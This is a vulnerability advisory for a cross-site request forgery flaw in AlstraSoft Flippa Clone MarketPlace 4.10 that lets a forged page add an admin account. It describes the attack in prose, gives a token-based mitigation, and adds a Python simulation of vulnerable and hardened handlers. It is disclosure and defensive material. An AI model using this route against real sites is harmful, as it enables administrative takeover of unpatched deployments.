vendor: Flippa Clone MarketPlace
by: Ihsan Sencan
CVSS: 8.8 (HIGH)
CWE: 352 (Cross-Site Request Forgery)
Product Name: Flippa Clone MarketPlace
Affected Version From: 4.10
Affected Version To: 4.10
Patch Exists: NO
Related CWE: N/A
CPE: a:alstrasoft:flippa_clone_marketplace:4.10
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
2017
AlstraSoft Flippa Clone MarketPlace v4.10 Script – Cross-Site Request Forgery (Add Admin)
A Cross-Site Request Forgery (CSRF) vulnerability exists in AlstraSoft Flippa Clone MarketPlace v4.10 Script that allows an attacker to add an admin user via a crafted HTML page. The page contains a form whose action is the vulnerable URL and whose fields carry the attacker's chosen values. When an authenticated administrator visits the page, the browser submits the form automatically with the victim's session, and the new admin user is created without the victim's intent.
Mitigation:
The application should verify that each state-changing request was intentionally issued by the authenticated user rather than forged by another site. This can be done with an unpredictable secret token tied to the user's session that is embedded in the legitimate form, sent with the request, and verified by the server before the action is performed.
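As an added illustration of the token-based mitigation (not code from this advisory or from the AlstraSoft product), the following Python models an "add admin" handler first with only the session cookie as its authority, as the advisory describes, and then with a per-session synchronizer token. The in-memory session store, the route and the form field names are assumptions.

```python
import hmac
import secrets

# Constructed in-memory session store (an assumption standing in for the
# application's real session mechanism): session_id -> session data.
SESSIONS = {}
ADMINS = set()

def create_session(user):
    """Log a user in and mint an unpredictable per-session CSRF token."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_urlsafe(32)}
    return sid

def render_add_admin_form(sid):
    """Legitimate form: the server embeds the session's token as a hidden
    field. A page on another origin cannot read it, so cannot reproduce it."""
    token = SESSIONS[sid]["csrf_token"]
    return ('<form method="POST" action="/admin/add">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input name="username"><input name="password"></form>')

def add_admin_vulnerable(sid, form):
    """Checks only the session cookie, which the browser sends with any POST."""
    if sid not in SESSIONS:
        return 401
    ADMINS.add(form["username"])
    return 200

def add_admin_hardened(sid, form):
    """Same handler plus a constant-time synchronizer-token comparison."""
    if sid not in SESSIONS:
        return 401
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(SESSIONS[sid]["csrf_token"], supplied):
        return 403
    ADMINS.add(form["username"])
    return 200

def simulate():
    """Constructed scenario: a logged-in admin's browser auto-submits a form
    from another site (no token), then submits the legitimate form."""
    ADMINS.clear()
    sid = create_session("admin")
    forged = {"username": "evil", "password": "x"}
    legit = {"username": "ops", "password": "y",
             "csrf_token": SESSIONS[sid]["csrf_token"]}
    return {"vulnerable_forged": add_admin_vulnerable(sid, forged),
            "hardened_forged": add_admin_hardened(sid, forged),
            "hardened_legit": add_admin_hardened(sid, legit),
            "admins": sorted(ADMINS)}
```

The forged submission succeeds against the first handler and is rejected with 403 by the second, while the server-rendered form, which carries the token, still works.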